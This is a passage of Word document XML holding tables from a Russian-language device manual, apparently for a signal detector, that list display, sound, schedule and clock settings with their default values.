          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>умолчанию</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Язык</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Язык </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбор языка для отображения экранной информации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">English (AHmnficKHfij/Russian </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>(Русский)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032"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Русский</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Яркость </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка уровня яркости для подсветки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>от 1 0 до 1 00% с шагом 1 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032"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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>С*</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выкл. дисплея</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка времени для автоматического выключения экрана после последнего нажатия на кнопку</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">От 8 сек до 2 мин, с шагом 8 сек. Крайнее правое положение метки </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>у9</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>99с</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>означает, что дисплей выключаться не будет.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032"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40 сек</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>О</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Автовкл. диспл.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Включение дисплея при обнаружении сигнала (если выключен)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбрано/не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Звуковыесигн. </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>Звуковой сигнал подтверждения нажатия на кнопки. Периодического звуковой сигнал при появлении надписи «АККУМУЛЯТОР РАЗРЯЖЕН». Переменный звуковой сигнал в случае обнаружения сигнала</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549"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r w:rsidRPr="00DD0245">
              <w:t>Выбрано/не выбрано</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B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="509"/>
        <w:gridCol w:w="4819"/>
        <w:gridCol w:w="1277"/>
        <w:gridCol w:w="1272"/>
        <w:gridCol w:w="1032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Время</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Расписание</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка расписания работы в АВТОМАТИЧЕ</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:softHyphen/>
              <w:t>СКОМ РЕЖИМЕ</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка времени в часах (от 0 до 23) для одно</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:softHyphen/>
              <w:t>кратного или ежедневного автоматического вклю</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:softHyphen/>
              <w:t xml:space="preserve">чения АВТОМАТИЧЕСКОГО РЕЖИМА на опреде^ ленное </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:lastRenderedPageBreak/>
              <w:t>время. Обнаруженные сигналы за каждый сеанс записываются в отдельный банк</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:lastRenderedPageBreak/>
              <w:t>Уст. время</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1272" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Время вкл. По умолчанию У часов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1272" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Время выкл. По умолчанию 1 7 часов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549"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ежедневно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032"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Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Уст. Часов</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка даты и времени</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549"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Последовательная установка: ЧАСЫ (Ч), МИНУТЫ (</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>ML</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve"> СЕКУНДЫ (С), ДЕНЬ (Д) и МЕСЯЦ (М). После каждой установки для перехода в следующую позицию нажимается</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1032" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Синхр. с ПК</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Автоматическая синхронизация с часами на компьютере при передаче какой-либо информации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбрано/Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
